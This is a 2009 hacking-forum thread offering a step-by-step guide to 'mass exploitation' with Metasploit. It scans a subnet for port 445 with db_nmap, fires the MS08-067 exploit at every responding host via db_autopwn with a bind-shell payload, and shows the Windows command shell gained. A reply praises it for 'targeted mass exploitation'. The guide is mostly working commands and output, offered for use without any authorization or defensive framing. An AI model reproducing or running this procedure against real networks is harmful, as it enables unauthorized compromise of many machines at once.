Offensive Guides & Information This is where you can post your guides.

InterN0T Affiliates:

Reply
 
LinkBack (1) Thread Tools Display Modes
  1 links from elsewhere to this Post. Click to view. #1  
Old 18th February 2009, 11:58
MaXe's Avatar
The Founder
  
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 2,612
Blog Entries: 30
Rep Power: 10
Reputation: 146
MaXe will become a Token soonMaXe will become a Token soon
Metasploit Mass Exploitation for Dummies
[Thanks to HD Moore for making this brief guide]


One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.

In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.

To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.


msf > load db_sqlite3[*] Successfully loaded plugin: db_sqlite3


Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:


msf > db_create[*] The specified database already exists, connecting[*] Successfully connected to the database[*] File: /root/.msf3/sqlite3.db


To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:


msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24


Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:


msf > db_autopwn -e -p -b -m ms08_067


Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.


msf > sessions -l
Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86

msf > sessions -i 1[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


Enjoy!


~ MaXe
__________________
Code:
                                ____/____\_________________
                      \|/      | OMG IT'S TEH LEET STORY!! |
    /*\         /\    -*-      |______  ________/\_________|
   // \\       /  \   /|\        /    \/    \  /  \
  /// \\\     /    \            /            \/    \
   // \\     /      \          /      \o/     \     \
    | |     /        \        /        |       \     \
 ___| |____/          \______/________/ \_______\_____\_________
          /     o      \
               #"=-
               /\
 __________________________________________________________
    On a mission, to find the lost member of Teh Unkwon..
Reply With Quote
  #2  
Old 20th February 2009, 16:03
MaXe's Avatar
The Founder
  
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 2,612
Blog Entries: 30
Rep Power: 10
Reputation: 146
MaXe will become a Token soonMaXe will become a Token soon
Re: Metasploit Mass Exploitation for Dummies
Indeed, it makes it a lot more easy to make targeted mass exploitation!
__________________
Code:
                                ____/____\_________________
                      \|/      | OMG IT'S TEH LEET STORY!! |
    /*\         /\    -*-      |______  ________/\_________|
   // \\       /  \   /|\        /    \/    \  /  \
  /// \\\     /    \            /            \/    \
   // \\     /      \          /      \o/     \     \
    | |     /        \        /        |       \     \
 ___| |____/          \______/________/ \_______\_____\_________
          /     o      \
               #"=-
               /\
 __________________________________________________________
    On a mission, to find the lost member of Teh Unkwon..
Reply With Quote
Reply

Bookmarks

« A look into RFI / LFI(s) | Dumping Memory thru Command Shell »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On

LinkBacks (?)
LinkBack to this Thread: http://forum.intern0t.net/offensive-guides-information/853-metasploit-mass-exploitation-dummies.html
Posted By For Type Date
el blog de stalin This thread Refback 16th August 2009 23:28

Similar Threads
Thread Thread Starter Forum Replies Last Post
Mass Milw0rm Exploit Finder and Downloader s3my0n Hacking Tools & Utilities 5 22nd November 2009 10:24
[Cross Platform] SecurityForest ~ ExploitTree & Exploitation Framework MaXe Hacking Tools & Utilities 3 29th July 2008 13:48


All times are GMT +2. The time now is 06:40.
Copyright ©2007 - Forever, InterN0T & Teh Unkwon

Banner


Contact Us - InterN0T - Archive - Top
Powered by vBulletin® Version 1.3.37
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.